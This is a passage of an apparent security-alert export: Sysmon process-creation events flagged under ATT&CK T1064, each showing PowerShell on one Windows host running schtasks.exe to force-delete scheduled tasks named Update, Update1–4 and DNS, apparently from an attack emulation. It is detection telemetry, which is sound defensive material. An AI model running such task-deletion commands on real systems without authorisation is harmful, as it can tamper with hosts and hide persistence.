Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.926",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.558 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010649c1e00} +ProcessId: 5556 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.563295400Z"",""eventRecordID"":""2502"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.558\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010649c1e00}\r\nProcessId: 5556\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.558"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010649c1e00}"",""processId"":""5556"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.892",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.508 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010649a1e00} +ProcessId: 5312 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update4 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.523638200Z"",""eventRecordID"":""2501"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.508\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010649a1e00}\r\nProcessId: 5312\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.508"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010649a1e00}"",""processId"":""5312"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update4 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.869",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.470 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001092981e00} +ProcessId: 4588 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.473694700Z"",""eventRecordID"":""2500"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.470\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001092981e00}\r\nProcessId: 4588\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.470"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001092981e00}"",""processId"":""4588"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.865",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.430 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001085961e00} +ProcessId: 7592 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.435516200Z"",""eventRecordID"":""2499"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.430\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001085961e00}\r\nProcessId: 7592\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.430"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001085961e00}"",""processId"":""7592"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.822",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.398 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010ca941e00} +ProcessId: 7888 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.401682200Z"",""eventRecordID"":""2498"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.398\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010ca941e00}\r\nProcessId: 7888\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.398"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010ca941e00}"",""processId"":""7888"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.262",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.370 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001009931e00} +ProcessId: 2596 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.373004300Z"",""eventRecordID"":""2497"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.370\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001009931e00}\r\nProcessId: 2596\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.370"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001009931e00}"",""processId"":""2596"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 